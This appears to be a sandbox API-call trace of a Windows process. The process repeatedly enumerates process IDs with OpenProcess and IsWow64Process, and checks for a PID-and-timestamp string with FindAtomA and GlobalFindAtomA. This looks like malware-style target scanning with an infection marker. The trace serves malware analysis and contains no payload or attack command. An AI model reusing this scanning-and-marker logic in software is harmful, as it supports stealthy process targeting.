	[0109.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.488] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.488] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0109.488] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0109.488] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0109.488] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.489] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0109.489] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.489] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0109.489] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0109.489] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0109.489] CloseHandle (hObject=0x694) returned 1
	[0109.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0109.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0109.490] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.490] CloseHandle (hObject=0x694) returned 1
	[0109.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0109.490] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.490] CloseHandle (hObject=0x694) returned 1
	[0109.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0109.490] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.490] CloseHandle (hObject=0x694) returned 1
	[0109.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0109.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0109.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0109.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0109.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0109.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0109.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0109.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0109.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0109.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0109.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0109.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0109.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0109.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0109.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0109.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0109.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0109.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0109.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0109.543] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.543] CloseHandle (hObject=0x694) returned 1
	[0109.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0109.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0109.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0109.544] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.544] CloseHandle (hObject=0x694) returned 1
	[0109.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0109.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0109.544] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.544] CloseHandle (hObject=0x694) returned 1
	[0109.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0109.544] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.544] CloseHandle (hObject=0x694) returned 1
	[0109.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0109.544] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.544] CloseHandle (hObject=0x694) returned 1
	[0109.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0109.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.545] CloseHandle (hObject=0x694) returned 1
	[0109.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0109.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.545] CloseHandle (hObject=0x694) returned 1
	[0109.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0109.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.545] CloseHandle (hObject=0x694) returned 1
	[0109.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0109.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0109.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.545] CloseHandle (hObject=0x694) returned 1
	[0109.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0109.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.546] CloseHandle (hObject=0x694) returned 1
	[0109.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0109.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.546] CloseHandle (hObject=0x694) returned 1
	[0109.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0109.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.546] CloseHandle (hObject=0x694) returned 1
	[0109.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0109.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.546] CloseHandle (hObject=0x694) returned 1
	[0109.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0109.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.546] CloseHandle (hObject=0x694) returned 1
	[0109.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0109.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.547] CloseHandle (hObject=0x694) returned 1
	[0109.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0109.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.547] CloseHandle (hObject=0x694) returned 1
	[0109.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0109.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.547] CloseHandle (hObject=0x694) returned 1
	[0109.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0109.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.547] CloseHandle (hObject=0x694) returned 1
	[0109.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0109.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.547] CloseHandle (hObject=0x694) returned 1
	[0109.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0109.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.548] CloseHandle (hObject=0x694) returned 1
	[0109.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0109.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.548] CloseHandle (hObject=0x694) returned 1
	[0109.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0109.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.548] CloseHandle (hObject=0x694) returned 1
	[0109.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0109.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.548] CloseHandle (hObject=0x694) returned 1
	[0109.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0109.549] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.549] CloseHandle (hObject=0x694) returned 1
	[0109.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0109.549] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.549] CloseHandle (hObject=0x694) returned 1
	[0109.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0109.549] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.549] CloseHandle (hObject=0x694) returned 1
	[0109.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0109.549] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.549] CloseHandle (hObject=0x694) returned 1
	[0109.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0109.549] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.549] CloseHandle (hObject=0x694) returned 1
	[0109.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0109.550] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.550] CloseHandle (hObject=0x694) returned 1
	[0109.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0109.550] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.550] CloseHandle (hObject=0x694) returned 1
	[0109.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.550] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.551] CloseHandle (hObject=0x694) returned 1
	[0109.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.551] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.551] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0109.551] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0109.552] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0109.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.552] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0109.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.552] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0109.552] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0109.553] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0109.612] CloseHandle (hObject=0x694) returned 1
	[0109.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0109.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0109.613] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.613] CloseHandle (hObject=0x694) returned 1
	[0109.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0109.613] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.613] CloseHandle (hObject=0x694) returned 1
	[0109.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0109.613] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.613] CloseHandle (hObject=0x694) returned 1
	[0109.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0109.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0109.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0109.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0109.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0109.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0109.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0109.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0109.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0109.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0109.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0109.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0109.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0109.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0109.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0109.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0109.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0109.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0109.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0109.696] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.696] CloseHandle (hObject=0x694) returned 1
	[0109.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0109.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0109.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0109.697] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.697] CloseHandle (hObject=0x694) returned 1
	[0109.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0109.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0109.697] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.697] CloseHandle (hObject=0x694) returned 1
	[0109.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0109.697] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.697] CloseHandle (hObject=0x694) returned 1
	[0109.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0109.697] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.697] CloseHandle (hObject=0x694) returned 1
	[0109.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0109.698] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.698] CloseHandle (hObject=0x694) returned 1
	[0109.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0109.698] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.698] CloseHandle (hObject=0x694) returned 1
	[0109.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0109.698] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.698] CloseHandle (hObject=0x694) returned 1
	[0109.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0109.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0109.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.699] CloseHandle (hObject=0x694) returned 1
	[0109.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0109.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.699] CloseHandle (hObject=0x694) returned 1
	[0109.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0109.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.699] CloseHandle (hObject=0x694) returned 1
	[0109.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0109.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.699] CloseHandle (hObject=0x694) returned 1
	[0109.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0109.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.699] CloseHandle (hObject=0x694) returned 1
	[0109.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0109.700] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.700] CloseHandle (hObject=0x694) returned 1
	[0109.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0109.700] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.700] CloseHandle (hObject=0x694) returned 1
	[0109.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0109.700] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.700] CloseHandle (hObject=0x694) returned 1
	[0109.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0109.700] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.700] CloseHandle (hObject=0x694) returned 1
	[0109.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0109.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.701] CloseHandle (hObject=0x694) returned 1
	[0109.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0109.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.701] CloseHandle (hObject=0x694) returned 1
	[0109.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0109.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.701] CloseHandle (hObject=0x694) returned 1
	[0109.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0109.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.702] CloseHandle (hObject=0x694) returned 1
	[0109.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0109.702] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.702] CloseHandle (hObject=0x694) returned 1
	[0109.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0109.702] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.702] CloseHandle (hObject=0x694) returned 1
	[0109.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0109.702] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.702] CloseHandle (hObject=0x694) returned 1
	[0109.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0109.702] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.702] CloseHandle (hObject=0x694) returned 1
	[0109.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0109.703] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.703] CloseHandle (hObject=0x694) returned 1
	[0109.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0109.703] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.703] CloseHandle (hObject=0x694) returned 1
	[0109.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0109.703] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.703] CloseHandle (hObject=0x694) returned 1
	[0109.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0109.703] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.703] CloseHandle (hObject=0x694) returned 1
	[0109.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0109.709] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.709] CloseHandle (hObject=0x694) returned 1
	[0109.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.709] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.709] CloseHandle (hObject=0x694) returned 1
	[0109.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.709] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.710] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0109.710] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0109.710] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0109.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.710] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0109.711] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.711] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0109.711] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0109.711] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0109.711] CloseHandle (hObject=0x694) returned 1
	[0109.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0109.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0109.711] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.711] CloseHandle (hObject=0x694) returned 1
	[0109.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0109.711] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.711] CloseHandle (hObject=0x694) returned 1
	[0109.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
